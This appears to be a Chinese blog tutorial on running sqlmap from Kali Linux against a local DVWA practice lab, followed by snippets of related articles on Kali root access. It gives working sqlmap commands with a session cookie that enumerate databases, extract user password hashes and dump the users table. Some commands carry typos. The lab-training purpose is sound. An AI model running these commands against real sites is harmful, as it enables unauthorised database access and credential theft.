网络安全与Kali:Sqlmap数据库注入实战

最新推荐文章于 2024-07-20 17:33:12 发布
最新推荐文章于 2024-07-20 17:33:12 发布
阅读量1.2k 收藏 25
点赞数 1
分类专栏: 科技 黑客 IT技术 文章标签: 网络 信息安全 计算机视觉 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiao1234oaix/article/details/108680054
版权
黑客 同时被 3 个专栏收录
193 篇文章 33 订阅
订阅专栏
科技
188 篇文章 10 订阅
订阅专栏
IT技术
173 篇文章 4 订阅
订阅专栏
  1. 背景介绍
    sqlmap 是一个开源渗透测试工具,它可以自动检测和利用 SQL 注入漏洞并接管数据库服务器。它具有强大的检测引擎,同时有众多功能,包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。
  2. 准备工作
    1.安装好Kali Linux的虚拟机一台;
    1.整装待发的小白一个。
    3.详细步骤
    3.1 在浏览器中输入自己的ip地址打开dvwa的主页面
    在这里插入图片描述
    3.2 选择默认安全等级
    在这里插入图片描述
    3.3 进入sql注入模块
    在这里插入图片描述

3.4 随便提交一个数据发现网站提交数据的方式是GET,然后复制地址栏上的URL
在这里插入图片描述

3.5 按F12打开浏览器的开发人员工具,然后刷新页面找到刚刚那个请求,然后在请求的请求头中找到cookie,复制其中的值到记事本中
在这里插入图片描述

3.6 回到kali打开终端输入以下命令
在这里插入图片描述
root@kali:-# sqlmap -u “http://192.168.0.101/dvwa/vulnerabilities/sqli/?id= 1&Submit=Submit#” --cookie ”security=low; PHPSESSID=r9t toc0nte03r3ofacqfu6jev2" --batch --dbs
3.7 回车后可以看见该网页所有的数据库被爆了出来
在这里插入图片描述
3.8 查看当前数据库
在这里插入图片描述

root@kali:-# sqlmap -u “http://192.168.0.101/dvwa/vulnerabilities/sqli/?id= 1&Submit=Submit#” --cookie ”security=low; PHPSESSID=r9t toc0nte03r3ofacqfu6jev2" --batch --current-db
3.9 查看数据库中的用户
在这里插入图片描述
root@kali:-# sqlmap -u “http://192.168.0.101/dvwa/vulnerabilities/sqli/?id= 1&Submit=Submit#” --cookie ”security=low; PHPSESSID=r9t toc0nte03r3ofacqfu6jev2" --batch --users
3.10 查看用户名和密码
在这里插入图片描述

root@kali:-# sqlmap -u “http://192.168.0.101/dvwa/vulnerabilities/sqli/?id= 1&Submit=Submit#” --cookie ”security=low; PHPSESSID=r9t toc0nte03r3ofacqfu6jev2" --batch --users --passwords
3.11 查看某数据库中的所有表
在这里插入图片描述

root@kali:-# sqlmap -u “http://192.168.0.101/dvwa/vulnerabilities/sqli/?id= 1&Submit=Submit#” --cookie ”security=low; PHPSESSID=r9t toc0nte03r3ofacqfu6jev2" --batch --D dvwa --tables
3.12 查看某表中的数据
在这里插入图片描述
root@kali:-# sqlmap -u “http://192.168.0.101/dvwa/vulnerabilities/sqli/?id= 1&Submit=Submit#” --cookie ”security=low; PHPSESSID=r9t toc0nte03r3ofacqfu6jev2" --batch --D dvwa -T users --colums
3.13 保存到本地
在这里插入图片描述
root@kali:-# sqlmap -u “http://192.168.0.101/dvwa/vulnerabilities/sqli/?id= 1&Submit=Submit#” --cookie ”security=low; PHPSESSID=r9t toc0nte03r3ofacqfu6jev2" --batch --D dvwa -T users -C “user,password” --dump
3.14 查看刚刚保存的内容

在这里插入图片描述root@kali:~# cat /root/.sqLmap/output/192.168.0.101/dump/dvwa/users.cvs

Ps:到此学习完毕,谢谢观看,获取更多干货请持续关注本号!

辛苦原创,各位看官记得好评加关注哦!你也可搜索:Kali与编程,学习更多Kali Linux渗透与白帽编程技巧哦!
亲爱的同学,下篇文章预计在明天下午五点发布!敬请期待!
点我学习完整视频渗透课,预计更新1000节

Kali与编程~
关注
专栏目录
Kali与编程:SqlMap数据库渗透测试与攻防演练
06-30
一、学完本课程,您将掌握:掌握Sqlmap使用方法掌握数据库渗透技巧   二、适合人群:1.零基础大学生 2.桌面运维工程师 3.网络运维工程师 4.渗透测试工程师三、学习计划:建议每天抽出2小时学习,并结合渗透测试实验环境,进行渗透攻防演练,不断提高自己的渗透技巧。四、课程目标:掌握Sqlmap数据库渗透测试技巧五、课程简介:一、课程目标       掌握Sqlmap数据库渗透测试技巧 二、课程特点       注重基础和实战,可操作、易上手 三、你将学到       SqlMap数据库攻防演练技巧 四、适合人员        兴趣网络安全与渗透测试的学员观看六、常见问题: 疑问1: 零基础可以学会吗?本课从零开始,由浅入深,跟着操作,零基础学员也能学会。 疑问2: 英语基础弱的学员能学习吗?英语不应该成为你提高自己的拦路虎或借口,英语是一个积累的过程,碰到不会的单词可借助现成翻译工具轻松解决。学习本质上是一个发现问题解决问题,由不懂到懂、从量变到质变的过程,加油!
kali】如何进入root用户
热门推荐
春天的波菜
06-20 1万+
kali linux默认用户是kali,但是安装程序需要root权限,如何实现?
Kali sqlmap、DVWA】
最新发布
weixin_50367387的博客
07-20 300
注:绿色框内的内容为DVWA中的SQL注入页面所在的URL;蓝色框的内容为该页面的cookie值(在该页面按F12调出开发界面,network中找到cookie值)(建议将kalisqlmap版本更新至最新版,这样就不会出现暂停选择了)遇到下列情况时,我们选择1并回车;(这是让我选择用什么去爆破密码)选择好密码破解方式后,我们就得到了账户和其密码;使用kalisqlmap工具对DVWA的SQL注入扫描。
kali如何进入root用户
weixin_48942495的博客
04-11 1万+
简单介绍如何进入root用户
进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器
weixin_43263566的博客
01-06 7026
Kali最强渗透工具- metasploit
kali启用root管理员登录
Yama的博客
06-07 6950
小伙伴们是否想用kali的root账号登录,普通账号操作权限问题确实挺麻烦的 其实我搜教程一般也喜欢图文并茂的,但是我不想把自己自己的kali删了在弄了,感觉看不懂可以直接艾特我 QQ:3463426674 1.启动Kali Liunx 进入开机启动页面,按键盘e键进入Kali GNU GRUB页面 2.在Kali GNU GRUB页面,选择linux那一行,将ro 改为 rw 在此行末尾增加 init=/bin/bash 修改完毕以后按Ctrl+X 键进入单用户模式 3.按Ctrl + C 进入单用户模式
kali linuxsqlmap注入ACCESS数据库.doc
03-04
Kali LinuxSQLmap 注入 ACCESS 数据库 Kali Linux 作为一个基于 Debian 的 Linux 发行版,广泛应用于渗透测试和安全评估中,而 SQLmap 则是一个开源的自动化 SQL 注入工具,旨在检测和利用 SQL 注入漏洞。下面...
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
1. SQLMapSQLMap 是一个开源的 SQL 注入检测工具,可以自动检测 SQL 注入漏洞。 2. Burp Suite:Burp Suite 是一个 Web 应用安全检测工具,包含 SQL 注入检测功能。 六、总结 SQL 注入是一种常见的 Web 应用安全...
网络攻防安全kali Linux漏洞扫描
06-18
#### 一、网络攻防安全中的Kali Linux漏洞扫描 **Kali Linux**是一款专门设计用于数字取证、安全审计、逆向工程和渗透测试的操作系统。它内置了大量的安全软件和工具,使其成为进行网络安全研究的理想平台。 #### ...
Sqlmap获取用户名与服务器.docx
04-14
Sqlmap 是一款功能强大且功能多样的渗透测试工具,特别是在数据库安全测试方面。通过 Sqlmap,我们可以轻松地检测数据库系统的漏洞,从而获取数据库用户名和密码。 Sqlmap 工具的使用非常广泛,特别是在渗透测试和...
sqlmap注入漏洞测试
02-22
在 Web 应用程序中, SQL 注入是一种常见的安全漏洞,它可以让攻击者访问和控制数据库中的敏感数据。SQLMap 是一款自动化的 SQL 注入工具,它可以检测和利用 SQL 注入漏洞,以获取数据库中的敏感信息。 在本文中,...
Kali-linux渗透攻击应用
2301_77162959的博客
05-17 2462
前面依次介绍了Armitage、MSFCONSOLE和MSFCLI接口的概念及使用。本节将介绍使用MSFCONSOLE工具渗透攻击MySQL数据库服务、PostgreSQL数据库服务、Tomcat服务和PDF文件等。
Kali 开启root用户登录
康师父Blog
05-30 1842
Kali 安装系统后,默认用户为非 root,不具备管理员权限。在 Kali 安装系统后,默认用户为非 root,不具备管理员权限。其具有系统中的最高权限,如启动或停止一个进程,删除或增加用户,增加或者禁用设备,添加文件和删除所有文件等等。其具有系统中的最高权限,如启动或停止一个进程,删除或增加用户,增加或者禁用设备,添加文件和删除所有文件等等。,是 Unix 系统(Linux、QNX 等),以及 Android 和 iOS 移动设备系统中的唯一的。,并输入密码,成功进入 root。
Kali Linux 安装 + 获取 root 权限 + 远程访问!保姆级教程!
jennycisp的博客
03-08 2754
kali系统内置大量渗透测试软件,可以说是巨大的渗透系统,涵盖了多个领域,如无线网络、数字取证、服务器、密码、系统漏洞等等,知名软件有:wireshark、aircrack-ng、nmap、hashcat、metasploit-framework(msf)。1、Kali开机后,ssh可能是默认关闭的,可通过service ssh status查看ssh状态,inactive(dead)则表示关闭,这里可以设置下ssh自启动。输入sudo passwd root,回车;先需要输入kali的密码,即kali
kali/linux设置root用户,始终用root权限登陆
qq_42685664的博客
03-31 3001
2、vi /etc/pam.d/gdm-autologin #按i健进入编辑模式,注释第三行(加个#),然后按esc退出编辑模式,按 :wq ,保存退出。3、apt-get install kali-root-login #下载kali-root-login包自动配置root。3、vi /etc/pam.d/gdm-password #同样注释第三行。1、sudo -s #进入root权限。1、sudo -s #进入root权限。5、passwd root #设置密码。
渗透工具——kaliSQLMap简介
2301_78006725的博客
09-02 840
首先,SQLMap是一个自动化的SQL注入工具,其主要功能是扫描、发现、利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库有MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB。3. 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中;4. 联合查询注入,可以使用union的情况下的注入
kali数据库操作_网络安全KaliSqlmap数据库注入实战
weixin_29063681的博客
02-06 910
课前声明:1、本分享仅做学习交流,请自觉遵守法律法规!2、搜索:Kali与编程,学习更多网络攻防干货!3、下篇文章将在明天下午五点发布,敬请关注!1. 背景介绍 Sqlmap 是一个开源渗透测试工具,它可以自动检测和利用 SQL 注入漏洞并接管数据库服务器。它具有强大的检测引擎,同时有众多功能,包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。2...
如何在Kali Linux中获得root权限?
2301_77498991的博客
05-05 1万+
在本教程中,我们学习了如何在Kali Linux中向普通用户授予root权限。你可以使用本指南中的说明,在任何命令前加上sudo,再也不用输入密码了。当Kali的开发者在最新的版本中限制root登录时,他们一定预料到一些用户会被激怒;因此,他们提供了许多恢复能力的选项。在使用根密码的时候,有一句话要注意:把它安全地控制起来;否则,系统就可能被破坏。我希望这篇文章对你在Kali Linux上工作时有指导意义。你可以使用这两种方法中的任何一种来获得系统中的root权限。
centos 修改root密码_Ubuntu、Redhat、Kali、CentOS重置root密码方法汇总
weixin_39872191的博客
11-23 167
Ubuntu开机时长按shift键,进入grub菜单如下:选择第二项,按E修改这一行,将末尾的ro recovery nomodeset 改为 rw single init=/bin/bash然后按CTRL+X执行passwd root 修改密码,重启即可Redhat进入启动界面后,按E选择第二项(kernel 模式)再按E编辑 输入single 回车,进入单用户模式然后按B(boot) 启动单用...
"Kali下运维安全详细笔记:从sql注入漏洞到使用sqlmap获得数据库数据
SQL注入是一种常见的网络攻击手法,通过在应用程序的输入框中插入恶意的SQL语句来获取未经授权的数据库数据。本文将详细介绍SQL注入的原理和攻击过程,并介绍如何使用Kali Linux中的工具sqlmap来自动化进行SQL注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kali与编程~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值